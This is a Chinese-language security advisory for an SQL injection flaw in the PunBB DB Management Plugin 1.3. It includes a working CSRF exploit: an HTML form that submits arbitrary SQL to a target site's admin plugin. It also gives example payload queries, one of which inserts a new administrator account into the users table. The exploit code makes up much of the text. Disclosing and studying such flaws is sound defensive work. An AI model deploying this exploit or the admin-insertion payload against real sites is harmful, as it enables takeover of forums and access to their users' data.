受影响系统:
PunBB DB Management Plugin 1.3
描述:
PunBB是一款基于PHP的论坛程序。
PunBB的管理插件(AP_DB_management.php)没有正确地验证用户用户请求中所提交的多个参数,远程攻击者可以通过提交恶意的查询请求执行SQL注入攻击。
<*来源:Dante90 (dante90.dmc4@hotmail.it)
链接:http://secunia.com/advisories/35595/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>[0-Day & Priv8] PunBB Administration Plug-In
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>
</head>
<body>
<center><fieldset>
<legend>Run SQL query</legend>
<form name="Dante90" method="post" action="
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php
">
<textarea name="this_query" rows="5" cols="50">
[SQL_Injection]
</textarea>
<input type="submit" name="submit" value="Run query" />
</form>
</fieldset></center>
</body>
</html>
SELECT * FROM users WHERE id=2;
SELECT * FROM users WHERE group_id=1;
INSERT INTO users (group_id, username, password, email, num_posts,
registration_ip, last_visit) VALUES(1, ‘[NICK_NEW_ADMIN]’,
‘md5("[PASSWORD_NEW_ADMIN]")’, ‘[E-MAIL_NEW_ADMIN]’, 1, ‘127.0.0.1’,
‘1220984516’);
建议:
厂商补丁:
PunBB
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。